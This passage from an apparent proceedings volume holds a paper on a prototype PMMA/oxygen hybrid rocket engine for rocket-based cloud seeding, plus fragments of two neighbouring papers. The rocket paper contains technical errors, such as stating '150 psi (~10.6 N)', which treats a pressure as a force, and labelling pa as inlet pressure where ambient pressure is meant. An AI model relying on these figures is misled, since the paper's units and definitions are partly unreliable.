algorithm using token for MANETs. Journal of Information Science and Engineering, 30(5),
1303–1319.
8. Défago, X., Schiper, A., & Urbán, P. (2004). Total order broadcast and multicast algorithms:
taxonomy and survey. ACM Computing Surveys, 36(4), 372–421.
9. Singh, G. & Badarpura, S. (2001). Application ordering in group communication. In Proceed-
ings 21st International Conference on Distributed Computing Systems Workshops (pp. 11–16)
Mesa, AZ, USA. https://doi.org/10.1109/CDCS.2001.918680.
10. Lamport, L. (1978). Time, clocks, and the ordering of events in a distributed system. Commu-
nications of the ACM, 21(7), 558–565.
11. Abrial, J. R. (2010). Modeling in event-B: System and software engineering. Cambridge Uni-
versity Press. ISBN 978-0-521-89556-9.
12. Metayer, C., Abrial, J. R., Voison, L. (2005). Event-B language. RODIN deliverables 3.2. http://
rodin.cs.ncl.ac.uk/deliverables/D7.pdf.
13. Abrial, J. R. (2007). A system development process with Event-B and the Rodin platform. In:
Lecture Notes In Computer Science (Vol. 4789, pp. 1–3). Springer.
14. Yadav, D., & Butler, M. (2005). Application of event B to global causal ordering for fault
tolerant Transactions. In Proceeding of REFT 2005, Newcastle upon Tyne, pp. 93–103 (2005)
15. Yadav, D., & Butler, M.: Formal development of a total order broadcast for distributed transac-
tions using event-B. In Lecture Notes in Computer Science (Vol. 5454, pp. 152–176). Springer-
Verlag Berlin Heidelberg.
16. Yadav, D., & Butler, M. (2006). Rigorous design of fault-tolerant transactions for replicated
database systems using event B. In: M. Butler, C.B. Jones, A. Romanovsky, E. Troubitsyna
(Eds.), Rigorous Development of Complex Fault-Tolerant Systems. Lecture Notes in Computer
Science (Vol. 4157). Berlin, Heidelberg: Springer.
17. Yadav, D., & Butler, M. (2009). Verification of liveness properties in distributed systems. In:
Ranka, S. (Eds.), Contemporary Computing. IC3, et al. (2009). Communications in Computer
and Information Science (Vol. 40). Berlin, Heidelberg: Springer.
18. Butler, M., & Yadav, D. (2008). An incremental development of the mondex system in Event-B.
Formal Aspects of Computing, 20(1), 61–77.
Engine Prototype and Testing
Measurements of Autonomous
Rocket-Based 360 Degrees Cloud Seeding
Mechanism

Satyabrat Shukla, Gautam Singh, and Purnima Lala Mehta

Abstract Water, being a necessity in various forms for power generation, drinking,
cultivation, and farming, is a crucial asset for humanity and is always in demand.
Many regions are still water-scarce and receive an irregular supply. As the population
increases, the need for water will rise drastically for these and other purposes. One
of the major problems arising from the scarcity of water is in agriculture, where lack
of water affects crop yields and survivability. To address these problems, we propose
and implement a novel technique of rocket-based 360-degree cloud seeding to
enhance artificial rain using an autonomous-landing rocket and various machine
learning concepts covering reinforcement learning, supervised learning, and
unsupervised learning. In this paper, we have tested and analyzed the first phase of
the proposed technique, which provided certain results on the design and application
of the first phase.

Keywords Artificial rain · Cloud seeding · Reinforcement learning · Autonomous
self-landing · Hybrid rocket · 360 degrees · Umbrella mechanism

1 Introduction

Water is the most important support system to sustain life on Earth. Various sources
of water like rivers, groundwater, and reservoirs are on the verge of depletion due to
the ever-increasing demands of the rising population. To meet these demands, many
countries attempt artificial rain to increase the probability of rainfall.

S. Shukla (B) · G. Singh · P. L. Mehta


IILM Academy of Higher Learning—College of Engineering and Technology, Greater Noida,
India
G. Singh
e-mail: gautam.singh.cs22@iilmcet.ac.in
P. L. Mehta
e-mail: purnima.mehta@iilm.edu


Though there are multiple impacts of the rain enhancement method, at many times it
has proven to be a better option than little or no rain at all. Implementing various
innovations and inventions, several methods and technologies such as planes, drones,
ground generators, electricity, lasers, and rockets are being used where rainwater is
insufficient. Among the many rain enhancement techniques, cloud seeding is one such
method and can be defined as the process that accelerates the rain-making process by
providing an additional nucleus around which water droplets can accumulate and
condense. Cloud seeding helps in hail suppression, which decreases the overall size
of the hailstones and thus minimizes the damage when they hit the ground, providing
prevention of crop damage, temperature control, pollution control, drought control,
etc. [1, 2]. It helps boost the agricultural sector, covering every benefit mentioned
earlier, such as prevention against crop damage and temperature control, which speeds
up the germination process of plants, while providing water as rain. The more water
is available, the more trees and plants grow, so the cycle of gas exchange becomes
stable and results in a good yield. Other applications include preventing flooding and
ponding damage to crops, as they require oxygen for respiration [3]. Cloud seeding
applications in the agriculture sector are endless and yet to be implemented completely.
Apart from traditional methods and applications, cloud seeding is still under research
today. One of the latest feasibility tests of cloud seeding was conducted in the Yadkin
river basin, North Carolina (US) [4] to increase hydropower energy from project
dams using air- and ground-borne seeding in different climatic conditions to increase
hydropower (clean energy). Similarly, the UAE recently applied cloud seeding
projects and went for a three-month-long process of cloud seeding in 2020, that is, a
total of 95 cloud seeding missions by the National Center of Meteorology (NCM),
based on the previous missions' results [5]. Not far behind, China also used and is
still using cloud seeding methods to combat water shortages, which may result in
adding 60 billion cubic meters of additional rainfall [6]. As China suffered from water
shortage, it came up with cloud seeding as a solution to the problem. Its new
charged-particle (negative ion)-based cloud seeding technique does not use
conventional chemicals but ion-based seeding that is cleaner, more beneficial,
environment friendly, and economical to operate on a large scale. However, it is
still research to be carried out in the field [7].
Recent studies in cloud seeding have examined the process and its enhancement in
different climate regions. Various countries like the UAE, Thailand, and Serbia are
using more efficient enhancement agents like core/shell sodium chloride
(NaCl)/titanium dioxide (TiO2) nanostructure (CNST) over previous agents like
NaCl seeding. The results show that CNST is a more efficient and powerful precipi-
tation enhancer depending on the humidity level and area [8]. In addition, recent
research by the University of Colorado at Boulder on quantifying snowfall [9] from
orographic cloud seeding for increasing snowpack in mountains is being tested; it
uses a radar dish to quantify snowfall, along with experiments using high-voltage
corona discharge in the formation of rain and snow [10]. The solution provided by
cloud seeding seems to have grabbed the attention of the world, yet countries like
India have not implemented cloud seeding projects to their full potential due to their
history with such projects. Recent activities that have come into consideration,

like Karnataka's climate modification projects [11], are continuations of previous
projects and seem likely to end soon. Weather modification has not been developed
and well implemented in India due to a lack of implementation, interest, and
involvement of government or private weather agencies in weather-related projects,
yet it is a viable option for future needs. All solutions seem to have some potential
to address water problems now and in the future, yet it must be considered that
playing with Mother Nature is not the best option. We need a controlled pattern and
plan to practice these techniques, but under control.

2 The Novel 360° Cloud Seeding Approach

Apart from many cloud seeding approaches, countries, companies, and agencies are
using rockets through an innovative network of artificial intelligence-enabled strategic
micro-rocket launches and a distributed grid of climatic sensors and spreading tech-
nologies for cloud seeding. For example, ACAP's Stroyproject "LOZA" missile protec-
tion system is designed for active impact on clouds by spraying chemical reagents
and for other considerations [12]. The Nashik rocket project in India, launching 1000
rockets to induce artificial rain, used a similar technique for cloud seeding [13]. The
rockets are launched from the ground with a missile rocket launcher vehicle to target
clouds nearer to the ground. This makes it suitable for targeting nearer clouds but
reduces the probability of area coverage when conditions do not favor the technique.
These missiles cover a trajectory path from the ground to the cloud for seeding and
finally fall to the ground. Such rocket methods are practical only for small projects,
which makes them a less appropriate option despite their great potential. Upgrading
the trajectory concept, the novel 360° cloud seeding approach is a new, highly
efficient, pattern-forming cloud seeding approach for maximum coverage per
seeding [14]. This reduces costs and increases the probability of rain formation and
the efficiency. The rocket heads toward the center of the targeted cloud and hovers
for a while to calculate the necessary details. After having complete assurance of
its surroundings and stability, it opens the umbrella mechanism (Fig. 2) and spreads
seeding agents by shooting four smaller rockets in all four directions (Fig. 3). After
this, the rocket heads back to the ground for self-landing, ready to target other
clouds. Meanwhile, if the previous cloud needs more seeding, the rocket follows the
above-mentioned approach but changes its orientation relative to the previous four
directions; this makes a circular seeding process that seeds the clouds in one go
rather than the conventional method of stripes in a row (Fig. 1) [14].
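
To picture how successive passes rotate the four seeding directions around the full
circle, a small hypothetical Python sketch is given below; the 90° spacing follows
the four-rocket design described above, while the 45° offset step per pass is an
assumption used only for illustration.

# Hypothetical illustration of the 360-degree seeding pattern: each pass fires
# four seeder rockets 90 degrees apart; the next pass rotates the whole set by
# an offset so that repeated passes cover the cloud circularly.
def seeding_directions(pass_number, offset_step=45.0):
    """Return the four launch azimuths (degrees) for a given seeding pass."""
    base = (pass_number * offset_step) % 360.0
    return [(base + k * 90.0) % 360.0 for k in range(4)]

for p in range(3):
    print(f"pass {p}: azimuths = {seeding_directions(p)}")
# pass 0: [0.0, 90.0, 180.0, 270.0]
# pass 1: [45.0, 135.0, 225.0, 315.0]
# pass 2: [90.0, 180.0, 270.0, 0.0]
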
Figure 1 shows the conventional methods used by planes, drones, etc., which apply
a multiple-stripes pattern technique in a single cloud for spreading seeding agents
into clouds. As per conventional or present-day technologies, this type of seeding is
considered the best option so far, as it ensures a higher probability of rainfall than
other used methods.

Fig. 1 Conventional methods [15]

Fig. 2 Umbrella mechanism completely open [12]

Even though this is the best option so far and alternative methods are being developed,
the procedure of plane-based cloud seeding reduces efficiency and rapidly increases
the time and cost.
Figure 2 shows the umbrella mechanism in action, which acts as a launching
platform for smaller rockets for stable and directional liftoffs. During the hovering
period, the arms open at 90° each, and the thrust platform provides an action-reaction
platform so that the smaller rockets gain maximum speed to shoot into the clouds in a

Fig. 3 360° pattern or orientation [12]

controlled direction. Four smaller rockets carrying seeding agents as fuel lift off
into the clouds to complete the task of 360° cloud seeding.
Figure 3 shows the 360° pattern or orientation that spreads the seeding agents in all
four directions. As mentioned for Fig. 2, the smaller rockets are launched in specific
directions for variable seeding. The directions in the above picture can be changed
to any four directions within 360° using thrust vectoring and the reaction control
system (RCS) [12] for active real-time control to increase the effectiveness of
seeding and the probability of rain.

2.1 Reinforcement Learning-Based Cloud Seeding Mechanism

The rocket-based cloud seeding method uses machine learning to make the whole
concept feasible in a real environment. It uses:
• Reinforcement learning (RL) [16]: Reinforcement learning (Fig. 4) is a part of
machine learning (ML) whose core idea is to mimic human real-time intelligence
of action and reaction (reflex), based on experience and real-time response to any
problem-solving activity, involving an environment (surroundings), an interpreter
(humans), an agent (rocket), and actions (reactions). This concept is used in our

Fig. 4 Reinforcement learning

RCS, self-landing mechanism [12], mission abort controls, trajectory behavior,
umbrella mechanism, real-time orientation adjustments, and all other required factors.
• Tracking cloud behaviors [17]: Cloud behavior, precipitation level, and other
indicators are monitored using machine learning.
• Monitoring rocket health: ML is used to check the overall health of the rocket,
especially the engines, making it more efficient to produce next-generation engine
management systems.
• Guidance, navigation and control (GN&C): Land vehicles can be controlled with
precise awareness of their path and trajectory, whereas rockets are extremely fast.
A small deviation in trajectory can put the rocket on a different path. This is where
computational power steps in, calculating altitude, center-of-mass rotation, and
trajectory with extreme precision in a fraction of time.
• Radar technology: A radar altimeter is used to define the positioning and deter-
mine the time for radio beams to hit the ground and return to the rocket, in order
to adjust the descent speed while landing the rocket (Figs. 5 and 6).
The system works first by handling the navigation of the rocket, i.e., its orientation
via the angle of reference of the trajectory and range, with pitch, roll, and yaw
configured per axis as Euler angles. The state vector of the rocket is controlled by
using sensors such as 3D orientation, position/altitude, gyroscopes, accelerometers,
a laser meter, a radio finder, and a video camera. All of this is done by the on-board
computer.
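
As a minimal illustration of this attitude bookkeeping (and not the authors' on-board
implementation), the Python sketch below converts roll, pitch, and yaw Euler angles
into a rotation matrix; the Z-Y-X rotation order and the sample angle are assumptions
made only for the sketch.

import math

def euler_to_rotation(roll, pitch, yaw):
    """Rotation matrix from roll/pitch/yaw (radians), Z-Y-X rotation order."""
    cr, sr = math.cos(roll), math.sin(roll)
    cp, sp = math.cos(pitch), math.sin(pitch)
    cy, sy = math.cos(yaw), math.sin(yaw)
    return [
        [cy * cp, cy * sp * sr - sy * cr, cy * sp * cr + sy * sr],
        [sy * cp, sy * sp * sr + cy * cr, sy * sp * cr - cy * sr],
        [-sp,     cp * sr,                cp * cr],
    ]

# Example: a small pitch deviation of 2 degrees, no roll or yaw
R = euler_to_rotation(0.0, math.radians(2.0), 0.0)
print([f"{x:.3f}" for x in R[0]])
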
The second part is guidance, which is altogether the most efficient and optimized
use of machine learning algorithms (nonlinear and non-convex equations) that
Fig. 5 Radar altimeter use in descent control in rocket [18]



Fig. 6 Euler’s angle [19]

define the working of the rocket. It is more the software side, used by the navigation
to communicate and decide the best course of action. Changes in direction are made
via mechanical inputs through TVC and RCS, giving small deviations that create
torque and steer the rocket to the right state vector controlled by the algorithms. It
is also responsible for mission abort if anything goes wrong.
The process starts with the liftoff of the rocket from the ground, fully equipped and
with all the necessary and predictable maneuvers planned. The on-board computer
starts taking all data and decisions. At a point in the middle of the flight trajectory,
the cloud tracking system starts giving detailed data and suggestions about the
humidity level and its positioning in 3D space to the ground control center, which
gives the final decision on the course of action. When the targeted cloud has been
entered, the rocket gives a final signal before starting the seeding process and checks
its orientation so that the mechanism can be activated by pressurizing the hydraulic
pistons. Meanwhile, the on-board computer continuously stabilizes the hovering
rocket using TVC and RCS against the variables. Reinforcement learning controls
every factor possible from liftoff to landing. The rocket hovers for a while; within
this time the umbrella mechanism [12] opens its arms and ignites the seeder rockets,
using both TVC and RCS to counterbalance the seeders' thrust in all four directions.
The rocket then descends, using radar to determine the descent speed, uses the
umbrella mechanism arms as active air brakes to slow down, and finally TVC and
RCS slowly land the rocket on the ground. The seeder rockets either get destroyed
during the seeding process or land on the ground using parachutes, giving their
active location to the control stations for collection. All these steps, maneuvers, and
data sharing work so fast that the total process takes only a few minutes to complete.
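
The sequence described above can be summarised as a simple progression of phases.
The following Python sketch is a hypothetical outline of that sequence (the phase
names follow the text; everything else is illustrative and is not flight software).

# Hypothetical outline of the mission sequence described above.
MISSION_PHASES = [
    "liftoff",            # ascent with planned maneuvers, on-board computer active
    "cloud_tracking",     # humidity / 3D-position data sent to ground control
    "hover_stabilize",    # TVC and RCS hold the rocket inside the target cloud
    "umbrella_open",      # hydraulic pistons open the umbrella arms
    "seeder_launch",      # four seeder rockets fired, thrust counterbalanced
    "descent",            # radar altimeter controls descent speed, arms as airbrakes
    "landing",            # TVC and RCS perform the final touchdown
]

def next_phase(current):
    """Return the phase that follows `current`, or None once landed."""
    i = MISSION_PHASES.index(current)
    return MISSION_PHASES[i + 1] if i + 1 < len(MISSION_PHASES) else None

phase = "liftoff"
while phase is not None:
    print(phase)
    phase = next_phase(phase)
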

3 Phase 1 Research Testing Report: The Proposed Concept

Materials used: polymethyl methacrylate (PMMA) fuel grain, an O2 tank for the
oxidizer, switch valves, pipes, an 8 × 8 × 8 inch aluminum block for the nozzle and
two 8 × 2 × 8 inch aluminum slabs for the supporting engine cover, aluminum rings
(12 inches), a pressure gauge, 0.5-inch screws, rubber inner walls, and miscellaneous
items.
Figure 7 explains the fuel and oxidizer flow. The oxidizer is released into the fuel
through an inlet at 150 psi (~10.6 N), initiating a chemical reaction inside the combus-
tion chamber; due to the temperature raised by ignition, the fuel starts burning in the
excess oxygen (O2). The pressure in the combustion chamber increases due to the
expansion of particles and gases, and a huge amount of thrust escapes from the rocket
nozzle, propelling the rocket forward.
Figure 8 shows the engine layout, including an inlet for the oxidizer, a pre-combustion
chamber for increasing the flow of the oxidizer, the fuel grain (PMMA), and a post-
combustion chamber for increasing the region of combustion before exiting through
the nozzle. All parts combined form the engine part of the hybrid rocket system
[15]. This system is optimal in terms of real-time control over accidents, ensuring
safety, efficiency, and reduction of internal and external damage to the rocket.
Figures 9 and 10 show the engine prototype's side and front views with an inlet for
the oxidizer, regulators, the skeleton frame, the fuel grain (PMMA), and the nozzle.
Figure 11a describes the theoretical nozzle design, made of aluminum and machined
on a CNC for accurate construction of the nozzle. It includes three parts: the combus-
tion chamber, where the expansion of fuel takes place by mixing the oxidizer and the fuel
Fig. 7 Oxidizer and engine workings/flow [12]

Fig. 8 Engine structural layout



Fig. 9 Rocket engine prototype phase 1 (side view)

Fig. 10 Rocket engine prototype phase 1 (front view)

and igniting it; the throat part compresses the expanded gases to an extreme velocity
that eventually gets released through the end of the nozzle, making the rocket move
forward against gravity.
Figure 11b is the actual nozzle design, which includes a contraction for making the
expanded gases gain extreme exit speed; the flow then moves toward the throat for
the highest compression possible by decreasing the flow area and increasing exit
pressure, force, and expansion, which gives maximum thrust and efficiency.
Figures 12 and 13 show the physical model of the nozzle, applying the design layout
on the CNC. The nozzle has a mass of 1.5 kg, as it is designed considering the
upcoming phases. During the upcoming phases, the designs will be made as accurate
as possible using 3D design tools, simulation, and rendering.

Fig. 11 a Theoretical nozzle design. b Actual nozzle design

Fig. 12 Actual nozzle design (side)

4 Testing Results

In this section, we will present the testing results of the rocket-based cloud seeding
mechanism. As rocket testing was conducted in different phases, we will elaborate
in detail on each phase in this section.

Fig. 13 Actual nozzle design (back)

• Ignition phase: Figure 14 showcases the burning of the fuel with the oxidizer,
ignited to reach the desired temperature for maximum thrust, burning out irregu-
larities in the design and the fuel along with it. The contraction, compression, and
expansion taking place initially are among the most crucial parts of thrust expansion,
ensuring constant thrust, and then the robustness of the design and its practicality.
This is one of the most important phases, as it ensures the safety, adaptability, and
strength of the design to handle the force exerted by the internal expansion of fuel
and oxidizer. If this phase fails, the design is considered fatal and re-designing must
be applied immediately. Our prototype was built for these kinds of internal pressures,
which resulted in a successful ignition phase, ensuring that the prototype is safe and
suitable for more pressure and can move to the next phase.
• Leveling up thrust phase (rise to maximum temperature): As the ignition
phase was safely executed, the prototype moved to the next phase to withstand an
even greater amount of pressure, as shown in Fig. 15; leveling up was performed
to reach the maximum temperature and pressure for full thrust. This phase examines
the design's workings in terms of calculation (pressure/force), ability to withstand
the rise in temperature, structural integrity, application of the design, and its
composition. This phase checks the engine efficiency and tests

Fig. 14 Ignition/initiation sparks



Fig. 15 Fuel at its maximum ignition temperature level for laminar flow

the engine to its maximum potential. At a certain pressure, the thrust becomes
constant for a certain time; it thus reaches its maximum potential and then decreases
as the inlet pressure decreases and becomes constant. At 150 psi (~10.6 N), the thrust
of the prototype became constant and then started decreasing slightly, as the oxidizer
inlet to the engine was limited and the exit pressure was increasing immensely.
• Maximum thrust and pressure phase: The maximum pressure and temperature
arc, along with the over-expanded thrust, results in the maximum thrust provided by
the engine. Figure 16 shows the ideal situation pa ≅ pe, the maximum thrust of
49.03 N (≈5 kgf) and pressure, and the first curve of diamond thrust. This phase is
connected to the leveling-up temperature phase, as it lasted only around 7–8 s before
the structural strength of the engine weakened as the temperature arc reached near
the inlet area. This shows that our design had some flaws (the pre-combustion
protection cover got damaged due to the temperature rise) in the area
Fig. 16 Ideal situation pa ≅ pe, maximum thrust 49.03 N and pressure, the first curve of diamond thrust

near the inlet pressure. The flaws are attributed to the unavailability of good insulators
for protection, which is the result of various external and miscellaneous factors.
After this result, the prototype was forced to shut down by cutting off the oxidizer
flow into the engine. Even though the result was not perfect, it showed the advantage
of having a hybrid engine, which gives full control to abort the testing if something
is out of control.
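
For background, the reason the ideal expansion condition pa ≅ pe quoted above
corresponds to maximum thrust can be seen from the standard textbook thrust
relation, which is not derived in this paper and is quoted here only for context:

F = \dot{m}\, v_e + (p_e - p_a)\, A_e

where \dot{m} is the propellant mass flow rate, v_e the exhaust velocity, A_e the
nozzle exit area, p_e the nozzle exit pressure, and p_a the ambient pressure. For a
given nozzle and ambient condition, the pressure term vanishes and thrust is
maximized when the nozzle is ideally expanded, i.e., p_e = p_a, which is the "ideal
situation" referred to in Fig. 16.
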
Final phase: After 7 seconds of burn time, the pressure and rising temperature
started melting the body (aluminum) along with the seal near the oxidizer inlet, as
shown in Fig. 17. Even though the body got damaged during the temperature arc, the
nozzle had no damage or melting. The test was completed with the result that many
things had to be reconsidered, like the inlet pressure, nozzle, material selection,
weight reduction, sealing, and the design. A few things did not go according to plan,
which is fine, as things are unpredictable in rocket science. After some debugging of
the design, the same engine will be practical for larger scaling of the prototype. The
test was a success, giving us the necessary details and data on various factors and
prompting us to rethink the design factors and safety. This also proved that reusability
of the rocket engine is possible, as during the test external factors were the only
unpredictable things; after multiple iterations, the final result will help to reduce the
overall cost of transporting the umbrella mechanism and seeders to their final position
in the clouds and will allow re-use of the engine for the next launch. Small steps and
iterations until the final rocket engine will provide the most efficient transporter of
the seeders. The next test will have the new, improved, reusable engine with far more
thrust.
Figure 18 shows the ideal case of the rise in altitude with respect to time for this
prototype if the thrust-to-weight ratio is TWR > 1 and the efficiency is higher; the
rocket then appears to rise exponentially. Apart from this ideal situation, the current
stage was not able to show such theoretical results. This means that the design of the
prototype was not up to the mark, with factors like excess weight and low thrust, i.e., TWR
Fig. 17 Vacuum inside the pre-combustion chamber and post-combustion chamber

Fig. 18 Altitude (ft) versus time (s) graph of the rocket

< 1; as shown in the graph, it takes a lot of time to overcome its inertial mass and
gain upward momentum against gravity (Fig. 19). The more time it takes to gain
momentum and cover maximum altitude, the less fuel it has to continue the
trajectory. With a better selection of materials and higher engine efficiency, the
altitude gained will increase in proportion to time.
Figure 19 shows the graph between thrust and acceleration. The prototype was able
to give 49.03 N of thrust, which was not sufficient to achieve TWR > 1; thus, the net
acceleration was negative, about −7.8 m/s² at 49.03 N. The negative acceleration
turned positive at around 250 N of thrust, since to make the rocket move it was
necessary to overcome g = 9.8 m/s² for liftoff.
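
These figures can be cross-checked with a small Python sketch. The total mass used
below is an assumption inferred from the reported values (49.03 N producing about
−7.8 m/s² implies a mass near 24.5 kg) and is not stated explicitly in the paper.

G = 9.8  # gravitational acceleration, m/s^2

def net_acceleration(thrust_n, mass_kg):
    """Net vertical acceleration: thrust/mass minus gravity (m/s^2)."""
    return thrust_n / mass_kg - G

def twr(thrust_n, mass_kg):
    """Thrust-to-weight ratio; liftoff requires TWR > 1."""
    return thrust_n / (mass_kg * G)

mass = 24.5  # kg, assumed total mass consistent with the reported -7.8 m/s^2
for thrust in (49.03, 250.0):
    print(f"thrust={thrust:6.1f} N  TWR={twr(thrust, mass):.2f}  "
          f"a={net_acceleration(thrust, mass):+.1f} m/s^2")
# thrust=  49.0 N  TWR=0.20  a=-7.8 m/s^2   (cannot lift off)
# thrust= 250.0 N  TWR=1.04  a=+0.4 m/s^2   (just above the liftoff threshold)
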
Figure 20 shows the graph between propulsion efficiency and equivalent velocity.
The propulsion efficiency shows irregularity because the oxidizer pressure through
the inlet (150 psi, ~10.6 N) was constant and lower as compared to what was
Fig. 19 Thrust (N) versus acceleration (m/s²) graph of the rocket; here negative acceleration means the rocket is overcoming its mass against gravity

Fig. 20 Propulsion efficiency (ηp) versus equivalent velocity (m/s) graph of the rocket

needed. Efficiency increases as pe (the exhaust pressure at the nozzle exit) and pa
(the inlet pressure) become equal, giving maximum thrust for the given fuel.

5 Result Discussion

This overall experiment of the rocket phase 1 prototype gave results close to the
calculations made in our previous work. The final phase was at its extreme level and
was in danger of explosion and burst-out of flames. The results we obtained showed
a payload capacity of 3.94 kg without any external forces like drag, air density, and
gravitational pull, as the test was done horizontally; with these forces the payload
capacity would have decreased even more. Apart from this, the availability of raw
materials for the design of the rocket was a huge problem that unexpectedly added an
unnecessary 10 kg to the overall mass of the rocket. Challenges may occur
unexpectedly; some are easy to tackle while others are variable and can occur at any
instant. Mechanical challenges: the working and the wear and tear of valves and other
mechanical/hardware parts; engine failure and leaks around seals; and dealing with
the pressure of the combustion in the engine chamber. Variable challenges: these
include other challenges that mostly affect the development or initial stage, such as
the availability of raw materials, design, the computational power of computers,
sensors, budget problems, and developing new techniques for optimization. All static
test problems occurred during the initial stage of rocket development, which includes
all the above challenges.

6 Conclusion

The Novel Umbrella 360 Cloud Seeding Based on Self-Landing Reusable Hybrid
Rocket will be one of the best available solutions regarding efficiency, reusability,
cost, and versatility among cloud seeding methods. In this report, the testing phase
has been explained along with its applications and the challenges faced, such as
structural design, assembly, management of temperature during testing, thrust,
calculations, and the results. The current phase can be classified as about 60%
according to plan and as proof of its scalability. This prototype shows the potential
for rocket-based cloud seeding to be a successful choice so far. During its scaling
up, this approach might become the best solution among rain-making methods; that
will be decided as things go according to plan toward making the final and most
efficient rocket-based weather modification system.

7 Future Scope

Future studies and applications regarding rocket-based cloud seeding must be
conducted, especially in the area relating rockets and cloud seeding, as present-day
studies and applications are limited and their technology does not ensure the goal of
providing rainfall and, ultimately, water availability. The expansion of rockets as
seeding-agent carriers enables the most efficient, quick, multitasking, and multi-use
application. Upcoming advancements in the effectiveness of rocket-based methods
can be even more accurate under different circumstances, which itself recommends
further studies on it. Furthermore, the concepts of the 360 umbrella seeding method,
the self-landing (thrust vectoring) method, and the reaction control system (RCS)
use machine learning algorithms, which will be explored, applied, and tested in this
sector as an integral part of the upcoming phases of the project. If things go according
to plan and the hypothesis holds, we will end up with a remarkable solution regarding
the weather modification system.

References

1. Cloud Seeding—An overview | ScienceDirect Topics. https://www.sciencedirect.com/topics/


earth-and-planetary-sciences/cloud-seeding. Last Accessed 01 Jan 2021.
2. Rosenfeld, D. (2007). New insights to cloud seeding for enhancing precipitation and for hail
suppression. Journal of Weather Modification, 39, 61–69.
3. Tech_Bulletin-5.pdf. http://www.niam.res.in/sites/default/files/pdfs/Tech_Bulletin-5.pdf.
4. Griffith, D., Yorty, D., & Simmons, W. N. (2019) Feasibility/design study for a cloud seeding
program in the Yadkin River Basin, North Carolina. Journal of Weather Modification, 51.
5. Godinho, V. (2020). UAE undertook 95 cloud seeding operations in Q1 2020, https://gulfbusin
ess.com/uae-undertook-95-cloud-seeding-operations-in-q1-2020. Last Accessed 15 Jan 2021.

6. China sets 2020 “artificial weather” target to combat water shortages, East Asia News & Top
Stories—The Straits Times. https://www.straitstimes.com/asia/east-asia/china-sets-2020-artifi
cial-weather-target-to-combat-water-shortages. Last Accessed 15 Jan 2021.
7. Zheng, W., Xue, F., Zhang, M., Wu, Q., Yang, Z., Ma, S., Liang, H., Wang, C., Wang, Y., Ai,
X., Yang, Y., & Yu, K. (2020). Charged particle (negative ion)-based cloud seeding and rain
enhancement trial design and implementation. Water, 12, 1644. https://doi.org/10.3390/w12
061644.
8. Ćurić, M., Lompar, M., Romanic, D., Zou, L., & Liang, H. (2019). Three-dimensional
modelling of precipitation enhancement by cloud seeding in three different climate zones.
Atmosphere, 10, 294. https://doi.org/10.3390/atmos10060294.
9. Quantifying snowfall from orographic cloud seeding | PNAS. https://www.pnas.org/content/
117/10/5190. Last Accessed 15 Jan 2021.
10. Yang, Y., Tan, X., Liu, D., Lu, X., Zhao, C., Lu, J., & Pan, Y. (2018). Corona discharge-induced
rain and snow formation in air. IEEE Transactions on Plasma Science, 46, 1786–1792. https://
doi.org/10.1109/TPS.2018.2820200.
11. Kumar, R. (2018). Scope of cloud seeding in India. IJRASET, 6, 4641–4645. https://doi.org/
10.22214/ijraset.2018.4762.
12. Stroyproject—about us. Manufacturer of LOZA ROCKETS. https://www.cloud-seeding.info/
page.php?id=2&lang=1. Last Accessed 16 Feb 2021.
13. Nashik: Rocket finally fired in dry zone, cloud seeding to bring in rain | Nashik News—Times
of India. https://timesofindia.indiatimes.com/city/nashik/nashik-rocket-finally-fired-in-dry-
zone-cloud-seeding-to-bring-in-rain/articleshow/48510296.cms?utm_source=contentofint
erest&utm_medium=text&utm_campaign=cppst. Last Accessed 16 Feb 2021.
14. Shukla, S., Singh, G., Sarkar, S. K., & Mehta, P. L. (2021). Novel umbrella 360 cloud
seeding based on self-landing reusable hybrid rocket. In International Conference on Inno-
vative Computing and Communications (pp. 999–1011). https://doi.org/10.1007/978-981-15-
5148-2_86..
15. Siliceo, E. P., A, A.A., Mosiño, P. A. (1963). Twelve years of cloud seeding in the Necaxa
Watershed, Mexico. Journal of Applied Meteorology and Climatology, 2, 311–323. https://doi.
org/10.1175/1520-0450(1963)002<0311:TYOCSI>2.0.CO;2.
16. Mnih, V., Kavukcuoglu, K., Silver, D., Rusu, A. A., Veness, J., Bellemare, M. G., Graves, A.,
Riedmiller, M., Fidjeland, A. K., Ostrovski, G., Petersen, S., Beattie, C., Sadik, A., Antonoglou,
I., King, H., Kumaran, D., Wierstra, D., Legg, S., & Hassabis, D. (2015). Human-level control
through deep reinforcement learning. Nature, 518, 529–533. https://doi.org/10.1038/nature
14236.
17. Xian, M., Liu, X., Yin, M., Song, K., Zhao, S., & Gao, T. (2020). Rainfall monitoring based
on machine learning by earth-space link in the ku band. IEEE Journal of Selected Topics in
Applied Earth Observations and Remote Sensing., 13, 3656–3668. https://doi.org/10.1109/JST
ARS.2020.3004375.
18. Molmud, P. (1963). Vernier exhaust perturbations on radar and altimeter systems during a lunar
landing. AIAA Journal, 1(12), 2816–2819. https://doi.org/10.2514/3.2177. https://arc.aiaa.org/
doi/abs/10.2514/3.2177?journalCode=aiaaj.
19. Li, Y., Lu, H., Tian, S., Jiao, Z., & Chen, J. T. (2011). Posture control of electromechanical-
actuator-based thrust vector system for aircraft engine. IEEE Transactions on Industrial Elec-
tronics, 59(9), 3561–3571. https://doi.org/10.1109/TIE.2011.2159351. https://ieeexplore.ieee.
org/abstract/document/5873146.
An Efficient Caching Approach
for Content-Centric-Based Internet
of Things Networks

Sumit Kumar, Rajeev Tiwari, and Gaurav Goel

Abstract The Internet of Things (IoT) has become established as a promising
environment, which connects a vast number of physical devices. The rapid increase
in the number of IoT devices has imposed many challenges on the Internet Protocol
(IP)-based Internet architecture. Towards this, content-centric networking (CCN) has
been recognized as a potential Internet architecture in which the contents are accessed
using a name-based mechanism. The underlying advantages of CCN, which include
in-network caching capabilities and faster data delivery, make it the most suitable
architecture for latency-sensitive IoT applications. In this paper, the proposed novel
content caching scheme efficiently utilizes the available caching resources. The
scheme considers the node degree-centrality, hop-based distance and the content
access frequency for making content caching decisions. The scheme places the
frequently accessed contents on the high degree-centrality routers close to the bound-
aries of the network and improves content availability. Comprehensive simulations on
the Abilene network topology with different cache capacities demonstrate the perfor-
mance improvement of the proposed scheme over peer caching schemes. The simulation
results are obtained for various performance metrics such as cache hit ratio, average
network hop-count and latency. The obtained quality-of-service (QoS) shows that the
proposed scheme is suitable for latency-sensitive CCN-based IoT networks.

Keywords CCN · IoT · Caching · Network performance

S. Kumar (B)
Department of Systemics, School of Computer Science, Energy Acres, University of Petroleum
and Energy Studies, Bidholi, Dehradun 248007, India
R. Tiwari
Department of Virtualization, School of Computer Science, Energy Acres, University of
Petroleum and Energy Studies, Bidholi, Dehradun 248007, India
e-mail: rajeev.tiwari@ddn.upes.ac.in
